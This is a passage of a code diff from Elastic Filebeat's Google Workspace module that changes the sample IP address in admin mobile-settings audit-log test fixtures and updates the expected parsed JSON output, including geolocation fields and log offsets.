+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ACTION_CANCELLED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ACTION_REQUESTED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"name"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICES_BULK_CREATION","parameters":[{"name":"NUMBER_OF_COMPANY_OWNED_DEVICES","intValue":10}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_BLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICE_DELETION","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_UNBLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_WIPED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT","parameters":[{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"GROUP"},{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"NEW_PERMISSION_GRANT_STATE","value":"GRANTED"},{"name":"OLD_PERMISSION_GRANT_STATE","value":"DENIED"},{"name":"PERMISSION_GROUP_NAME","value":"LOCATION"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_SETTINGS","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_APPLICATION_TO_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_DELETE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_ADMIN_RESTRICTIONS_PIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"cert"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_ACCOUNT_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json
index 80c0d6dc9e27..e03554502e54 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json
@@ -8,7 +8,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_CANCELLED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_CANCELLED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "info",
@@ -28,24 +28,20 @@
 "log.offset": 0,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -69,7 +65,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_REQUESTED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_REQUESTED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "info",
@@ -86,27 +82,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 534,
+ "log.offset": 533,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -130,7 +122,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"name\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"name\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -144,26 +136,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1068,
+ "log.offset": 1066,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -184,7 +172,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICES_BULK_CREATION\",\"parameters\":[{\"name\":\"NUMBER_OF_COMPANY_OWNED_DEVICES\",\"intValue\":10}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICES_BULK_CREATION\",\"parameters\":[{\"name\":\"NUMBER_OF_COMPANY_OWNED_DEVICES\",\"intValue\":10}]}}",
 "event.provider": "admin",
 "event.type": [
 "creation"
@@ -196,26 +184,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1548,
+ "log.offset": 1545,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -236,7 +220,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_BLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_BLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -249,26 +233,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1951,
+ "log.offset": 1947,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -289,7 +269,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
